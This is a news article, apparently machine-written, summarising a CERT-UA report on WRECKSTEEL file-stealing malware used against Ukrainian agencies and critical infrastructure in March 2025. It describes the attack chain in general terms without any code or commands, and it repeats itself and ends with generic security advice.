Ethical Hacking News
CERT-UA reports three cyberattacks targeting Ukrainian agencies and critical infrastructure in March 2025 with WRECKSTEEL Malware. The attacks aimed at collecting and stealing information from computers using appropriate software tools.
The Computer Emergency Response Team (CERT-UA) of Ukraine recently reported three cyberattacks targeting Ukrainian agencies and critical infrastructure in March 2025. The attacks used WRECKSTEEL malware to steal files, with versions available in VBScript and PowerShell. The threat actor has been using compromised accounts to send emails with links leading to VBScript loaders that download PowerShell scripts. NSIS installers have also been used with decoy files and IrfanView by the attackers. The attackers are evolving their tactics, with screenshot functionality now powered by PowerShell from 2025 onwards. The targets of the attack include various file types, suggesting a desire to steal sensitive information and disrupt critical infrastructure. Organizations must review their security protocols, implement robust cybersecurity measures, and train employees on cyber safety best practices to prevent similar attacks.
CERT-UA, the Computer Emergency Response Team of Ukraine, recently reported three cyberattacks targeting Ukrainian agencies and critical infrastructure in March 2025. The attacks were aimed at collecting and stealing information from computers using appropriate software tools.
The Ukrainian government's computer emergency response team, CERT-UA, has been taking systematic measures to accumulate and analyze data on cyber incidents in order to provide up-to-date information on cyber threats. As part of this effort, the team reported the three cyberattacks that occurred in March 2025. According to the report, the attacks were carried out using WRECKSTEEL malware, which is a primary tool used for stealing files.
The WRECKSTEEL malware has versions in VBScript and PowerShell, and it is not persistent. This means that any signs of cyberattacks should be reported to CERT-UA immediately for prompt cyber protection measures. The report includes indicators of compromise (IoCs) that can help identify and mitigate the threat.
Since fall 2024, a threat actor has been using compromised accounts to send emails with links leading to VBScript loaders that download PowerShell scripts. These scripts search for sensitive files and take screenshots for exfiltration via cURL. The attackers have also used NSIS installers with decoy files and IrfanView.
Notably, from 2025 onwards, the screenshot functionality has shifted to being powered by PowerShell. This change indicates that the threat actor is evolving its tactics and using more sophisticated tools to evade detection.
The targets of the attack include file types like .doc, .pdf, .xls, .png, and more. The use of WRECKSTEEL malware and other techniques suggests that the attackers are seeking to steal sensitive information and disrupt critical infrastructure.
CERT-UA's report highlights the importance of vigilance and cooperation in combating cyber threats. It also underscores the need for organizations to stay informed about emerging threats and take proactive measures to protect themselves.
In light of this report, it is essential for organizations to review their security protocols and ensure that they are taking all necessary steps to prevent similar attacks. This includes implementing robust cybersecurity measures, conducting regular vulnerability assessments, and training employees on cyber safety best practices.
Furthermore, the report serves as a reminder of the ongoing threat landscape and the need for continuous monitoring and improvement of cybersecurity defenses. By staying informed about emerging threats and taking proactive steps to protect themselves, organizations can reduce their risk exposure and minimize the impact of potential cyberattacks.
In conclusion, CERT-UA's report on WRECKSTEEL malware attacks highlights the growing threat of cybercrime in Ukraine and beyond. The use of sophisticated tools and techniques by attackers underscores the importance of vigilance and cooperation in combating these threats. By staying informed and taking proactive measures to protect themselves, organizations can reduce their risk exposure and minimize the impact of potential cyberattacks.
Related Information:
https://www.ethicalhackingnews.com/articles/CERT-UA-Reports-WRECKSTEEL-Malware-Attacks-on-Ukrainian-Agencies-and-Critical-Infrastructure-ehn.shtml
Published: Fri Apr 4 06:12:55 2025 by llama3.2 3B Q4_K_M